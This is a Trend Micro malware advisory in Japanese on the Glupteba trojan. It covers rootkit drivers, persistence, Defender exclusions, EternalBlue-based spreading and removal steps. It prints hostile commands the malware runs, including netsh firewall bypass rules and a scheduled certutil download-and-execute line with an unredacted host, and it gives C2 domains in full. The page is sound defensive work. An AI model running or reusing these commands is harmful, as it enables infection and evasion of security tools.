Trend Micro Security

Trojan.Win32.GLUPTEBA.AFJK

2019年1月31日
 解析者: Arvin Roi Macaraeg   

 別名:

Trojan.Win32.Chapak.btde(KASPERSKY), VirTool:Win32/CryptInject.YD!MTB(MICROSOFT), Win32:CrypterX-gen [Trj](AVAST)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:


  • マルウェアタイプ: トロイの木馬型
  • 破壊活動の有無: なし
  • 暗号化: はい
  • 感染報告の有無: はい

  概要

感染経路 他のマルウェアからの作成, インターネットからのダウンロード

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、特定のWebサイトにアクセスし、情報を送受信します。


  詳細

ファイルサイズ 4,830,208 bytes
タイプ EXE
メモリ常駐 はい
発見日 2019年1月18日
ペイロード URLまたはIPアドレスに接続, ファイルの作成, システムのレジストリの変更

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のコンポーネントファイルを作成します。

  • %System%\drivers\winmon.sys - rootkit, hides processes.
  • %System%\drivers\WinmonFS.sys - rootkit, hides files and folders.
  • %System%\drivers\WinmonProcessMonitor.sys - rootkit, finds specific processes and closes them.

(註:%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)

マルウェアは、感染したコンピュータ内に以下のように自身のコピーを作成します。

  • %Windows%\rss\csrss.exe

(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)

マルウェアは、以下のフォルダを作成します。

  • %User Temp%\csrss
  • %Windows%\rss

(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)

マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。

  • Global\h48yorbq6rm87zot
  • Global\y7ze3fznx1u0yc2z

マルウェアは、自身(コンピュータに侵入して最初に自身のコピーを作成したマルウェア)を終了し、侵入したコンピュータ内で作成した自身のコピーの方を実行します。

自動実行方法

マルウェアは、自身のコピーがWindows起動時に自動実行されるよう以下のレジストリ値を追加します。

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
{random name} = %Windows%\rss\csrss.exe

他のシステム変更

マルウェアは、以下のレジストリキーを追加します。

HKEY_CURRENT_USER\Software\Microsoft\
TestApp

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon\Security

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Security

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor

マルウェアは、以下のレジストリ値を追加します。

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
CDN = http://{BLOCKED}ild.info

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
DisplayName = Winmon

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
ErrorControl = 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
Start = 3

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
Type = 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon\Security
Security = {hex values}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
DependOnService = FltMgr

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
DisplayName = WinmonFS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
ErrorControl = 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Group = FSFilter Activity Monitor

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
ImagePath = \??\%System%\drivers\WinmonFS.sys

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Start = 3

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Type = 2

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances
DefaultInstance = WinmonFS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS
Altitude = 370000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS
Flags = 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Security
Security = {hex values}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
ImagePath = \??\%System%\drivers\Winmon.sys

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
DisplayName = WinmonProcessMonitor

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
ErrorControl = 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
ImagePath = \??\{hex values}\drivers\WinmonProcessMonitor.sys

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
Start = 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
Type = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows% = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows%\rss = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Application Data%\EpicNet Inc\CloudNet = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%User Temp%\csrss = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Application Data%\PatientVoice = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows%\windefender.exe = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%User Temp%\wup = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%System%\drivers = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
csrss.exe = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
cloudnet.exe = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
windefender.exe = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
{malware filename} = 0

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Name = {random}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Defender = {string}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Servers = https://{BLOCKED}anys.com, https://{BLOCKED}acon.com, https://{BLOCKED}mpirebuild.com

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
UUID = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Command = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
FirstInstallDate = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
CloudnetSource = {string}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
ServiceVersion = {string}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
SC = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
PGDSE = {value]

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
VC = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
OSCaption = {Operating System of affected machine}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
OSArchitecture = {32 or 64}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
IsAdmin = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
AV = {strings}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
PatchTime = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
CPU = {CPU details of affected machine}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
GPU = {GPU details of affected machine}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Firewall = {string}

ダウンロード活動

マルウェアは、以下のWebサイトにアクセスして自身のコンポーネントファイルをダウンロードします。

  • http://{BLOCKED}ild.info/app/watchdog.exe
  • http://{BLOCKED}ild.info/app/deps.zip
  • http://{BLOCKED}ild.info/app/app.exe
  • http://{BLOCKED}ild.info/app/vc.exe
  • http://{BLOCKED}ip.com/cl.exe

マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。

  • One of the downloaded file is extracted and saved as:
    • %User Temp%\csrss\smb\adfw-2.dll
    • %User Temp%\csrss\smb\adfw.dll
    • %User Temp%\csrss\smb\cnli-0.dll
    • %User Temp%\csrss\smb\cnli-1.dll
    • %User Temp%\csrss\smb\coli-0.dll
    • %User Temp%\csrss\smb\crli-0.dll
    • %User Temp%\csrss\smb\dmgd-1.dll
    • %User Temp%\csrss\smb\dmgd-4.dll
    • %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
    • %User Temp%\csrss\smb\esco-0.dll
    • %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
    • %User Temp%\csrss\smb\exma-1.dll
    • %User Temp%\csrss\smb\exma.dll
    • %User Temp%\csrss\smb\iconv.dll
    • %User Temp%\csrss\smb\libcurl.dll
    • %User Temp%\csrss\smb\libeay32.dll
    • %User Temp%\csrss\smb\libiconv-2.dll
    • %User Temp%\csrss\smb\libxml2.dll
    • %User Temp%\csrss\smb\payload32.dll
    • %User Temp%\csrss\smb\payload64.dll
    • %User Temp%\csrss\smb\pcla-0.dll
    • %User Temp%\csrss\smb\pcre-0.dll
    • %User Temp%\csrss\smb\pcrecpp-0.dll
    • %User Temp%\csrss\smb\pcreposix-0.dll
    • %User Temp%\csrss\smb\posh-0.dll
    • %User Temp%\csrss\smb\posh.dll
    • %User Temp%\csrss\smb\pytrch.py
    • %User Temp%\csrss\smb\pytrch.pyc
    • %User Temp%\csrss\smb\riar-2.dll
    • %User Temp%\csrss\smb\riar.dll
    • %User Temp%\csrss\smb\ssleay32.dll
    • %User Temp%\csrss\smb\tibe-1.dll
    • %User Temp%\csrss\smb\tibe-2.dll
    • %User Temp%\csrss\smb\tibe.dll
    • %User Temp%\csrss\smb\trch-0.dll
    • %User Temp%\csrss\smb\trch-1.dll
    • %User Temp%\csrss\smb\trch.dll
    • %User Temp%\csrss\smb\trfo-0.dll
    • %User Temp%\csrss\smb\trfo-2.dll
    • %User Temp%\csrss\smb\trfo.dll
    • %User Temp%\csrss\smb\tucl-1.dll
    • %User Temp%\csrss\smb\tucl.dll
    • %User Temp%\csrss\smb\ucl.dll
    • %User Temp%\csrss\smb\xdvl-0.dll
    • %User Temp%\csrss\smb\zibe.dll
    • %User Temp%\csrss\smb\zlib1.dll
    • %User Temp%\csrss\smb\_pytrch.pyd
  • %User Temp%\csrss\cloudnet.exe
  • %User temp%\csrss\vc.exe
  • %Windows%\windefender.exe

(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)

その他

マルウェアは、以下のWebサイトにアクセスし、情報を送受信します。

  • https://{DOMAIN}/bots/register
  • https://{DOMAIN}/bots/poll
  • https://{DOMAIN}/bots/update-data
  • https://{DOMAIN}/bots/report-install
  • https://{DOMAIN}/bots/log
  • https://{DOMAIN}/bots/report
  • https://{DOMAIN}/bots/scheduled-install
  • https://{DOMAIN}/bots/install-failure

<補足>
インストール

マルウェアは、以下のコンポーネントファイルを作成します。

  • %System%\drivers\winmon.sys - プロセスを隠すルートキット
  • %System%\drivers\WinmonFS.sys - ファイルおよびフォルダを隠すルートキット
  • %System%\drivers\WinmonProcessMonitor.sys - 特定のプロセスを見つけ出し終了させるルートキット

その他

マルウェアは、以下を実行します。

  • マルウェアは、EternalBlue / DoublePulsarのコンポーネントを使用して以下のソフトウェアの脆弱性を利用し、コインマイナーのコンポーネントをネットワーク上に拡散します。
    • Microsoft Windows SMB サーバ(MS17-010) の脆弱性
  • VMware または VirtualBox環境下で実行されていることを確認した場合、自身を終了します。
  • Windowsファイアウォールを迂回するために、以下のコマンドを実行します。
    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%Windows%\rss\csrss.exe" enable=yes
    netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%Application Data%\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes
  • 以下のWebサイトに接続し、コインマイナーとその設定ファイルをダウンロードします。 https://{ドメイン}.com/bots/post-ia-data?uuid={UUID}
    以下のWebサイトに接続し、コインマイナーとその設定ファイルをダウンロードします。
    %User temp%\wup\wup.exe
    %User temp%\wup\wupv.exe
  • 以下のレジストリエントリを変更して、Windows Updateサービスを無効にします。
    HKEY_LOCAL_MACHINE\CurrentControlSet\services\wuauserv
    value = Start
    data = 4
  • マルウェアは、AVプロダクトの実行を検知すると、自身の活動を終了します。

マルウェアは、以下のスケジュールされたタスクを追加します。

  • タスク名: csrss
    スケジュール:任意のユーザのログオン時
    実行するタスク:%Windows%\rss\csrss.exe
  • タスク名:ScheduledUpdate
    スケジュール:任意のユーザのログオン時
    実行するタスク: cmd.exe /C certutil.exe -urlcache -split -f http://{BLOCKED}ets.com/app/app.exe %User Temp%\csrss\scheduled.exe && %User Temp%\csrss\scheduled.exe /31340

注意:

{ドメイン}の値には以下のいずれかが当てはまります。

  • https://{BLOCKED}anys.com
  • https://{BLOCKED}acon.com
  • https://{BLOCKED}mpirebuild.com


      対応方法

    対応検索エンジン: 9.850
    初回 VSAPI パターンバージョン 14.782.05
    初回 VSAPI パターンリリース日 2019年1月30日
    VSAPI OPR パターンバージョン 14.782.00
    VSAPI OPR パターンリリース日 2019年1月31日

    手順 1

    Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

    手順 2

    このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

    手順 3

    Windowsをセーフモードで再起動します。

    [ 詳細 ]

    手順 4

    このレジストリキーを削除します。

    [ 詳細 ]

    警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
    レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
    レジストリの編集前にこちらをご参照ください。

    • In HKEY_CURRENT_USER\Software\Microsoft
      • TestApp
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
      • Winmon
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
      • Security
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
      • WinmonFS
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
      • Instances
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances
      • WinmonFS
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\servicesWinmonFS
      • Security
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
      • WinmonProcessMonitor

    手順 5

    このレジストリ値を削除します。

    [ 詳細 ]

    警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
    レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
    レジストリの編集前にこちらをご参照ください。

    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
      • DisplayName = Winmon
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
      • ErrorControl = 0
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
      • Start = 3
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
      • Type = 1
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon\Security
      • Security = {hex values}
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
      • DependOnService = FltMgr
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
      • DisplayName = WinmonFS
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
      • ErrorControl = 0
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
      • Group = FSFilter Activity Monitor
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
      • ImagePath = \??\%System%\drivers\WinmonFS.sys
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
      • Start = 3
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
      • Type = 2
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances
      • DefaultInstance = WinmonFS
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances\WinmonFS
      • Altitude = 370000
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances\WinmonFS
      • Flags = 0
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Security
      • Security = {hex values}
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
      • ImagePath = \??\%System%\drivers\Winmon.sys
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
      • DisplayName = WinmonProcessMonitor
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
      • ErrorControl = 0
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
      • ImagePath = \??\{hex values}\drivers\WinmonProcessMonitor.sys
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
      • Start = 1
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
      • Type = 1
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
      • %Windows% = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
      • %Windows%\rss = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
      • %Application Data%\EpicNet Inc\CloudNet = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
      • %User Temp%\csrss = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
      • %Application Data%\PatientVoice = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
      • %Windows%\windefender.exe = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
      • %User Temp%\wup = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
      • %System%\drivers = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
      • csrss.exe = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
      • cloudnet.exe = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
      • windefender.exe = 0
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
      • {malware filename} = 0
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • Name = {random}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • Defender = {string}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • Servers = https://weekkdanys.com, https://okonewacon.com, https://blackempirebuild.com
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • UUID = {value}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • Command = {value}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • FirstInstallDate = {value}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • CloudnetSource = {string}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • ServiceVersion = {string}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • SC = {value}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • PGDSE = {value]
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • VC = {value}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • OSCaption = {Operating System of affected machine}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • OSArchitecture = {32 or 64}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • IsAdmin = {value}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • AV = {strings}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • PatchTime = {value}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • CPU = {CPU details of affected machine}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • GPU = {GPU details of affected machine}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • Firewall = {string}
    • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
      • CDN = http://headbuild.info

    手順 6

    変更されたレジストリ値を修正します。

    [ 詳細 ]

    警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
    事前に意図的に対象の設定を変更していた場合は、意図するオリジナルの設定に戻してください。変更する値が分からない場合は、システム管理者にお尋ねいただき、レジストリの編集はお客様の責任として行なって頂くようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
    レジストリの編集前にこちらをご参照ください。

    • In HKEY_LOCAL_MACHINE\CurrentControlSet\services\wuauserv
      • From: Start = 4
        To: Start = (usually 2)

    手順 7

    スケジュールされたタスクを削除する

    タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。

    • Task Name: csrss
      Task to be run: %Windows%\rss\csrss.exe
    • Task Name: ScheduledUpdate
      Task to be run: cmd.exe /C certutil.exe -urlcache -split -f http://headbuild.info/app/app.exe %User Temp%\csrss\scheduled.exe && %User Temp%\csrss\scheduled.exe /31340



    Windows 2000、Windows XP、Windows Server 2003の場合:

    1. [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
    2. 上記の{タスク名} を、[名前]の欄に入力します。
    3. 入力した{タスク名} 持つファイルを右クリックします。
    4. [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
    5. 上記の{実行するタスク}と文字列が一致するタスクを削除します。

    Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:

    1. Windowsタスクスケジューラを開きます。
      • Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
      • Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。
    2. 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
    3. 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
    4. 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
    5. 文字列が一致するタスクを削除します。

    手順 8

    以下のファイルを検索し削除します。

    [ 詳細 ]
    コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
    • %System%\drivers\winmon.sys
    • %System%\drivers\WinmonFS.sys
    • %System%\drivers\WinmonProcessMonitor.sys
    • %User temp%\wup\wup.exe
    • %User temp%\wup\wupv.exe
    • %User Temp%\csrss\scheduled.exe
    • %User Temp%\csrss\cloudnet.exe
    • %User temp%\csrss\vc.exe
    • %Windows%\windefender.exe
    • %User Temp%\csrss\smb\adfw-2.dll
    • %User Temp%\csrss\smb\adfw.dll
    • %User Temp%\csrss\smb\cnli-0.dll
    • %User Temp%\csrss\smb\cnli-1.dll
    • %User Temp%\csrss\smb\coli-0.dll
    • %User Temp%\csrss\smb\crli-0.dll
    • %User Temp%\csrss\smb\dmgd-1.dll
    • %User Temp%\csrss\smb\dmgd-4.dll
    • %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
    • %User Temp%\csrss\smb\esco-0.dll
    • %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
    • %User Temp%\csrss\smb\exma-1.dll
    • %User Temp%\csrss\smb\exma.dll
    • %User Temp%\csrss\smb\iconv.dll
    • %User Temp%\csrss\smb\libcurl.dll
    • %User Temp%\csrss\smb\libeay32.dll
    • %User Temp%\csrss\smb\libiconv-2.dll
    • %User Temp%\csrss\smb\libxml2.dll
    • %User Temp%\csrss\smb\payload32.dll
    • %User Temp%\csrss\smb\payload64.dll
    • %User Temp%\csrss\smb\pcla-0.dll
    • %User Temp%\csrss\smb\pcre-0.dll
    • %User Temp%\csrss\smb\pcrecpp-0.dll
    • %User Temp%\csrss\smb\pcreposix-0.dll
    • %User Temp%\csrss\smb\posh-0.dll
    • %User Temp%\csrss\smb\posh.dll
    • %User Temp%\csrss\smb\pytrch.py
    • %User Temp%\csrss\smb\pytrch.pyc
    • %User Temp%\csrss\smb\riar-2.dll
    • %User Temp%\csrss\smb\riar.dll
    • %User Temp%\csrss\smb\ssleay32.dll
    • %User Temp%\csrss\smb\tibe-1.dll
    • %User Temp%\csrss\smb\tibe-2.dll
    • %User Temp%\csrss\smb\tibe.dll
    • %User Temp%\csrss\smb\trch-0.dll
    • %User Temp%\csrss\smb\trch-1.dll
    • %User Temp%\csrss\smb\trch.dll
    • %User Temp%\csrss\smb\trfo-0.dll
    • %User Temp%\csrss\smb\trfo-2.dll
    • %User Temp%\csrss\smb\trfo.dll
    • %User Temp%\csrss\smb\tucl-1.dll
    • %User Temp%\csrss\smb\tucl.dll
    • %User Temp%\csrss\smb\ucl.dll
    • %User Temp%\csrss\smb\xdvl-0.dll
    • %User Temp%\csrss\smb\zibe.dll
    • %User Temp%\csrss\smb\zlib1.dll
    • %User Temp%\csrss\smb\_pytrch.pyd
  • Windows 2000、XP および Server 2003 の場合:

    1. [スタート]-[検索]-[ファイルとフォルダすべて]を選択します。
    2. [ファイル名のすべてまたは一部]に以下のファイル名を入力してください。
      • %System%\drivers\winmon.sys
      • %System%\drivers\WinmonFS.sys
      • %System%\drivers\WinmonProcessMonitor.sys
      • %User temp%\wup\wup.exe
      • %User temp%\wup\wupv.exe
      • %User Temp%\csrss\scheduled.exe
      • %User Temp%\csrss\cloudnet.exe
      • %User temp%\csrss\vc.exe
      • %Windows%\windefender.exe
      • %User Temp%\csrss\smb\adfw-2.dll
      • %User Temp%\csrss\smb\adfw.dll
      • %User Temp%\csrss\smb\cnli-0.dll
      • %User Temp%\csrss\smb\cnli-1.dll
      • %User Temp%\csrss\smb\coli-0.dll
      • %User Temp%\csrss\smb\crli-0.dll
      • %User Temp%\csrss\smb\dmgd-1.dll
      • %User Temp%\csrss\smb\dmgd-4.dll
      • %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
      • %User Temp%\csrss\smb\esco-0.dll
      • %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
      • %User Temp%\csrss\smb\exma-1.dll
      • %User Temp%\csrss\smb\exma.dll
      • %User Temp%\csrss\smb\iconv.dll
      • %User Temp%\csrss\smb\libcurl.dll
      • %User Temp%\csrss\smb\libeay32.dll
      • %User Temp%\csrss\smb\libiconv-2.dll
      • %User Temp%\csrss\smb\libxml2.dll
      • %User Temp%\csrss\smb\payload32.dll
